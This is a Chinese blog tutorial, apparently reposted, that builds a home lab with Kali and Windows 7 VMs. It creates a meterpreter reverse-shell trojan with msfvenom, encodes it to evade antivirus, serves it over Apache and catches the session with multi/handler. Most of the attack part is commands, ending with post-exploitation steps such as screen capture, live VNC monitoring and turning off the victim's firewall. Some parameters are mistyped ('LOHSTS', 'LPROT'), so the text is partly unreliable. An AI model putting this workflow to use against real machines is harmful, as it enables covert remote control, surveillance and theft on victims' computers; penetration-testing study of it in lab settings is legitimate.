失眠网,内容丰富有趣,生活中的好帮手!
失眠网 > 利用msfvenom生成木马文件反弹shell

利用msfvenom生成木马文件反弹shell

时间:2020-11-24 08:13:53

相关推荐

利用msfvenom生成木马文件反弹shell

目录

1.安装靶机和攻击机

2.利用生成木马文件

3.msf里面开启监听

4.攻击成功且利用

5.meterpreter简单系统命令

1.安装靶机和攻击机

首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。

kali的下载地址Get Kali | Kali Linux: 在虚拟机里面直接选择打开就可以了。

攻击机 kali ip是192.168.3.138

靶机win7 ip是192.168.3.150

2.利用生成木马文件

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LOHSTS=192.168.3.138 LPROT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/西瓜1.exe

-a指定构架如x86 x64。 x86代表32位, x64代表64位。 32位软件可以在64 位系统上运行。所以我们生成32位的后门。这样在32位和64位系统中都可以使用。

--platform指定平台,这里选择windows 通过 --l platform可以查看所有支持平台。

-p设置攻击载荷,我们使用windows/meterpreter/reverse_tcp,可以通过-l payloads 查看所有攻击载荷

LOHSTS监听的ip地址

LPROT监听端口

-e指定编码器,也就是所谓的免杀, x64/shikata_ga_nai是msf自带的编码器 -l encode 查看有多少编码器

-i制作的软件字节,可随意

-f输出文件格式

-b避免使用的字符

-o文件输出位置以及名字

如果你想靶机能够下载文件,需要在kali开启apache 命令:systemctl start apache2

在win7里面输入地址192.168.3.138/西瓜1.exe,先保存,我保存在桌面方便后期操作。

3.msf里面开启监听

第一步:开启msf:msfdb run

第二步:使用use exploit/multi/handler

第三步:查看参数show options可以通过show payload 查看需要设置那个payload 。

第四步:设置payload 可以看到默认的payload不是我想要的,所以我要重新设置一下,这个payload和你上面产生木马文件的payload要一样的。set payload windows/meterpreter/reverse_tcp

第五步:设置监听的IP地址set LHOST 192.168.3.138

第六步: 开启监听run

4.攻击成功且利用

这时候当对方运行软件的时候,这边就会监听到,运行一下就可以了

可以看到建立会话,查看用户是普通用户,因为我登录时候就是普通用户登录的。下一篇是我基于win7的提权文章,如果想拿到更高权限,感兴趣可以看看。

基于msf内网渗透的win7提权几种方法_dreamthe的博客-CSDN博客

5.meterpreter简单系统命令

1.ps命令可以用来获取目标主机上正在运行的进程信息

2.sysinfo 查看系统信息

3.screenshot对于目标机进行截图

4.5. run vnc 可以远程实时监控目标机的画面。

5.runpost/windows/gather/checkvm 查看目标机是不是虚拟机。

6.7.run post/windows/gather/dumplinks 获取目标主机上最近访问过的文档、链接信息

sh adcfirewall set allprofiles state off 关闭防火墙

8.backgroup 将会话保存到后台

9.sessions 查看当前会话

10.sessions -i 11 进入会话,11是会话的ID就是编号。

11.sessions -k 11 会话结束。

12.unset LHOSt 撤销设置。

如果觉得《利用msfvenom生成木马文件反弹shell》对你有帮助,请点赞、收藏,并留下你的观点哦!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。